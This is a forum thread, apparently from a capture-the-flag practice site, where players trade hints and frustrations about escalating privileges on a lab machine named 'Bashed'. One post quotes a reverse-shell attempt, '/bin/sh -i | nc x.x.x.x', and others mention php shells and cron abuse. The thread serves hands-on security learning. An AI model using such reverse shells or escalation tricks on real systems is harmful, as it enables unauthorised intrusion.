Bashed

So that was it, just a pair of bigger glasses to get root

@Saoirse said:
It’s like watching an AngryJoeShow video review :smiley:

I’d love to have access to a sub-forum for each box, password protected by the root flag, then we could discuss why certain things wouldn’t work that under different circumstances would of, it’s just a thought…

This is an awesome idea!! Would love to see it implemented if possible!!

Surprised at how long it took to get root; mainly due to poor attention to detail.

That said, it was not as straight forward as the ratings would suggest. Expect a number of distinct actions and pay close attention to the details of important files/directories.

Enjoy!

i am using the basic priv esc cheat sheet from got milk. I still cant see the way to move from www-data to priv user. please any suggestion other than try harder will help! I have been enumerating for days and i just cat see the way.

There is a way of reading the file you need… without being root

There’s probably a better way though… really you should become root

It’s been 2 days and still no luck with priv esc.
Someone please drop a little hint besides enumeration

Ok i see the scripts directory. Have used the linenum.sh script. I have tried /bin/sh -i | nc x.x.x.x wich failed.dont seem to be a way to get python to spawn a shell. cant change /etc/profile as i am not root. Can u give a next hint to get out of jailed shell?

pm Me

ls “minus” l “slash” …enough said

Enough !
I’m leaving this box.

Finally I’m very close to getting root !
I just wanted to ask how did you guys execute the file before getting root cause i’m getting a permission denied message

@lordsoahc said:
i am using the basic priv esc cheat sheet from got milk. I still cant see the way to move from www-data to priv user. please any suggestion other than try harder will help! I have been enumerating for days and i just cat see the way.

Stuck in the same position.Tried “python” too. no clue how to proceed

I just got the flag for root, and this box drove me crazy!

Guys, i’m very noob to hacking and even more in web hack, if someone could give me some tips I will appreciate XD.
I already enumerate de directories, didn’t find nothing interesting
I try some way to put a php on site to create my way in bit nothing works.
the only php on site have nothing inside and I couldn’t exploit it

Could you guys help me?

Same here. I don’t know how to proceed after reading test.py. Anyone can give me a consistent hint (or even explain the next step) in PM?
Trying is important to learn, getting stuck forever is only frustrating and I don’t learn.
Thanks in advance.

nevermind I got root

hi, i managed to get user.txt. currently, i have a php shell script in the tmp folder but trying to move it to the var folder to no avail. any help would be appreciated! thanks!

I keep struggling to get priv escalation from php since. Can anyone share a hint through PM

i also have stuck on priv esc. - runnning test.py it says 'permission denied. i tried bunch of sudo using scriptmanager or root - everytime it asks the password for current user. it is dead end. i saw somebody might used cron vector, but previous post siad what i even dont need rev shell to read root.txt. please, help because i couldn find another sudo options after lot of surfing the net which could work.